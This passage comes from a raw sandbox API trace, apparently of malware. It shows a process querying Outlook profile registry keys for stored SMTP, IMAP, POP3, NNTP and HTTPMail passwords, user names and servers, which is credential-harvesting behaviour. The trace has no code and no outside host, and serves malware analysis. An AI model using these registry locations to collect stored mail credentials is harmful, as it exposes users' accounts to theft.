lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.555] RegCloseKey (hKey=0x544) returned 0x0 [0236.555] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.566] RegQueryValueExW (in: hKey=0x544, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.566] RegCloseKey (hKey=0x544) returned 0x0 [0236.566] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.566] RegQueryValueExW (in: hKey=0x544, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.566] RegCloseKey (hKey=0x544) returned 0x0 [0236.566] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.567] RegQueryValueExW (in: hKey=0x544, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.567] RegCloseKey (hKey=0x544) returned 0x0 [0236.567] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x544) returned 0x0 [0236.567] RegQueryValueExW (in: hKey=0x544, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.567] RegCloseKey (hKey=0x544) returned 0x0 [0236.579] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c1c8 | out: phkResult=0x615c1c8*=0x544) returned 0x0 [0236.594] RegQueryInfoKeyW (in: hKey=0x544, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c1f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c1f8*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.594] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.594] RegQueryValueExW (in: hKey=0x554, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.595] RegCloseKey (hKey=0x554) returned 0x0 [0236.595] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.595] RegQueryValueExW (in: hKey=0x554, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.595] RegCloseKey (hKey=0x554) returned 0x0 [0236.596] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.596] RegQueryValueExW (in: hKey=0x554, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.596] RegCloseKey (hKey=0x554) returned 0x0 [0236.596] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.596] RegQueryValueExW (in: hKey=0x554, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.596] RegCloseKey (hKey=0x554) returned 0x0 [0236.597] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.597] RegQueryValueExW (in: hKey=0x554, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.597] RegCloseKey (hKey=0x554) returned 0x0 [0236.598] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.598] RegQueryValueExW (in: hKey=0x554, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.598] RegCloseKey (hKey=0x554) returned 0x0 [0236.598] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.598] RegQueryValueExW (in: hKey=0x554, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.598] RegCloseKey (hKey=0x554) returned 0x0 [0236.599] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.599] RegQueryValueExW (in: hKey=0x554, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.599] RegCloseKey (hKey=0x554) returned 0x0 [0236.599] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.600] RegQueryValueExW (in: hKey=0x554, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.600] RegCloseKey (hKey=0x554) returned 0x0 [0236.600] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.600] RegQueryValueExW (in: hKey=0x554, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.600] RegCloseKey (hKey=0x554) returned 0x0 [0236.601] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.601] RegQueryValueExW (in: hKey=0x554, lpValueName="Email", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.601] RegCloseKey (hKey=0x554) returned 0x0 [0236.601] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.601] RegQueryValueExW (in: hKey=0x554, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.601] RegCloseKey (hKey=0x554) returned 0x0 [0236.602] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.602] RegQueryValueExW (in: hKey=0x554, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.602] RegCloseKey (hKey=0x554) returned 0x0 [0236.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.603] RegQueryValueExW (in: hKey=0x554, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.603] RegCloseKey (hKey=0x554) returned 0x0 [0236.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.603] RegQueryValueExW (in: hKey=0x554, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.603] RegCloseKey (hKey=0x554) returned 0x0 [0236.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.604] RegQueryValueExW (in: hKey=0x554, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.604] RegCloseKey (hKey=0x554) returned 0x0 [0236.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.604] RegQueryValueExW (in: hKey=0x554, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.604] RegCloseKey (hKey=0x554) returned 0x0 [0236.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.604] RegQueryValueExW (in: hKey=0x554, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.604] RegCloseKey (hKey=0x554) returned 0x0 [0236.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.605] RegQueryValueExW (in: hKey=0x554, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.605] RegCloseKey (hKey=0x554) returned 0x0 [0236.605] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.605] RegQueryValueExW (in: hKey=0x554, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.605] RegCloseKey (hKey=0x554) returned 0x0 [0236.605] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.605] RegQueryValueExW (in: hKey=0x554, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.605] RegCloseKey (hKey=0x554) returned 0x0 [0236.605] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.605] RegQueryValueExW (in: hKey=0x554, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.605] RegCloseKey (hKey=0x554) returned 0x0 [0236.605] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.606] RegQueryValueExW (in: hKey=0x554, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.606] RegCloseKey (hKey=0x554) returned 0x0 [0236.606] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.606] RegQueryValueExW (in: hKey=0x554, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.606] RegCloseKey (hKey=0x554) returned 0x0 [0236.606] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.606] RegQueryValueExW (in: hKey=0x554, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.606] RegCloseKey (hKey=0x554) returned 0x0 [0236.606] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.606] RegQueryValueExW (in: hKey=0x554, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.606] RegCloseKey (hKey=0x554) returned 0x0 [0236.606] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.606] RegQueryValueExW (in: hKey=0x554, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.606] RegCloseKey (hKey=0x554) returned 0x0 [0236.607] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x554) returned 0x0 [0236.607] RegQueryValueExW (in: hKey=0x554, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.607] RegCloseKey (hKey=0x554) returned 0x0 [0236.607] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c1c8 | out: phkResult=0x615c1c8*=0x554) returned 0x0 [0236.607] RegQueryInfoKeyW (in: hKey=0x554, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c1f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c1f8*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4*=0x6, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.607] RegEnumKeyExW (in: hKey=0x554, dwIndex=0x0, lpName=0x26bff44, lpcchName=0x615c214, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000001", lpcchName=0x615c214, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.607] RegEnumKeyExW (in: hKey=0x554, dwIndex=0x1, lpName=0x26bff44, lpcchName=0x615c214, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000002", lpcchName=0x615c214, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.607] RegEnumKeyExW (in: hKey=0x554, dwIndex=0x2, lpName=0x26bff44, lpcchName=0x615c214, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x615c214, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.608] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.608] RegQueryValueExW (in: hKey=0x558, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.608] RegCloseKey (hKey=0x558) returned 0x0 [0236.608] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.608] RegQueryValueExW (in: hKey=0x558, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.608] RegCloseKey (hKey=0x558) returned 0x0 [0236.608] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.608] RegQueryValueExW (in: hKey=0x558, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.608] RegCloseKey (hKey=0x558) returned 0x0 [0236.608] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.608] RegQueryValueExW (in: hKey=0x558, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.608] RegCloseKey (hKey=0x558) returned 0x0 [0236.608] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.609] RegQueryValueExW (in: hKey=0x558, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.609] RegCloseKey (hKey=0x558) returned 0x0 [0236.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.609] RegQueryValueExW (in: hKey=0x558, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.609] RegCloseKey (hKey=0x558) returned 0x0 [0236.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.609] RegQueryValueExW (in: hKey=0x558, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.609] RegCloseKey (hKey=0x558) returned 0x0 [0236.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.609] RegQueryValueExW (in: hKey=0x558, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.609] RegCloseKey (hKey=0x558) returned 0x0 [0236.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c0ec | out: phkResult=0x615c0ec*=0x558) returned 0x0 [0236.610] RegQueryValueExW (in: hKey=0x558, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c160, lpData=0x0, lpcbData=0x615c15c*=0x0 | out: lpType=0x615c160*=0x0, lpData=0x0, lpcbData=0x615c15c*=0x0) returned 0x2 [0236.610] RegCloseKey (hKey=0x558) returned 